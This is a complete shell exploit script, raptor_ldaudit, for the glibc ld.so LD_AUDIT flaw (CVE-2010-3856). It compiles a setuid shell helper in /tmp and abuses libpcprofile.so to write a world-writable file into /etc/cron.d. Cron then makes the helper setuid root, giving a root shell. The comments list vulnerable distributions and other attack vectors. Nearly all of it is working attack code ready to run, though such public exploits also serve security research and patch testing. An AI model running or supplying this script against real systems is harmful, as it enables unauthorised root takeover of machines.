#!/bin/sh # # $Id: raptor_ldaudit,v 1.2 2011/02/04 11:05:15 raptor Exp $ # # raptor_ldaudit - privilege escalation through glibc ld.so # Copyright (c) 2010 Marco Ivaldi # # Property of @ Mediaservice.net Srl Data Security Division # http://www.mediaservice.net/ http://lab.mediaservice.net/ # # ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x # before 2.12.2, does not properly restrict use of the LD_AUDIT environment # variable to reference dynamic shared objects (DSOs) as audit objects, which # allows local users to gain privileges by leveraging an unsafe DSO located in # a trusted library directory, as demonstrated by libpcprofile.so # (CVE-2010-3856). # # "Suit up. Score chicks. Be awesome." -- Barney Stinson # # This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben # Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344 # # Other possible attack vectors: /etc/cron.{hourly,daily,weekly,monthly}, at # (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d and more... # # Usage: # $ chmod +x raptor_ldaudit # $ ./raptor_ldaudit # [...] # Everything looks fine. Just wait for it... LEGEN-DARY! # -rwsr-xr-x 1 root users 5707 2010-11-11 14:48 /tmp/pwned # sh-4.1# id # uid=0(root) gid=0(root) groups=0(root),100(users) # sh-4.1# # [don't forget to delete /tmp/pwned*!] # # Vulnerable platforms: # Slackware 13.1 [tested, weird loop in dillon's cron but it works] # openSUSE 11.3 [untested] # Fedora Core 13 [untested] # RHEL/CentOS 5 [untested] # Ubuntu 10 [untested] # [...] # echo "raptor_ldaudit - privilege escalation through glibc ld.so" echo "Copyright (c) 2010 Marco Ivaldi " echo # prepare setuid shell helper to circumvent bash checks echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c gcc -o /tmp/pwned /tmp/pwned.c if [ $? -ne 0 ]; then echo "Error: Problems compiling setuid shell helper, check your gcc." exit 1 fi # do the magic! runme="/etc/cron.d/runme" umask 0 LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null if [ "`cat $runme 2>/dev/null`" = "" ]; then echo "Error: Not vulnerable or wrong attack vector? See comments." exit 1 fi # build the cron script (vixie's crontab) echo -n > $runme echo "* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme # build the cron script (dillon's crontab) echo "* * * * * chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme # legen -- wait for it -- dary! echo -n "Everything looks fine. Just wait for it... " sleep 70 echo "LEGEN-DARY!" ls -l /tmp/pwned /tmp/pwned